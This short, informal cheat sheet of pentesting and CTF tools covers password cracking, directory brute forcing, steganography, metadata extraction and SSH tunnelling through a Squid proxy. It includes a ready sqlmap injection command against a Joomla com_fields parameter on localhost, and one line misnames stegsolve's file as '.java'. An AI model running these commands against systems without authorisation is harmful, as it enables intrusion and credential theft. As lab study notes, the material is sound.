Tulz
@nzjohn the ripper : john hashfile.txt ~~password cracking
DirBuster: dirb http://192.168.1.5 ~~brute force directories
sqlmap: ~~SQL injection
Using Sqlmap: sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
above command lists databases (--dbs)
BurpSuit ~~intercept clnt & svr comm:
~~ Stegnography~~
steghide: steghide extract -sf picture.jpg ~~to extract from jpeg
steghide embed -cf picture.jpg -ef secret.txt ~~To embed in jpeg
stegsolve: java -jar stegsolve.java (to run)~~to check a particular img for pass by using
different layers
exiftool: To extract meta data
exiftool <file.png>
exiftool -h Tux.png > Tux.html ~~To export to file
Setting Squid proxy(Proxytunnel): sudo proxytunnel -p 192.168.43.158:3128 -d 127.0.0.1:22 -a 2121(-p final destination -d we type in ssh -a the port we give in ssh)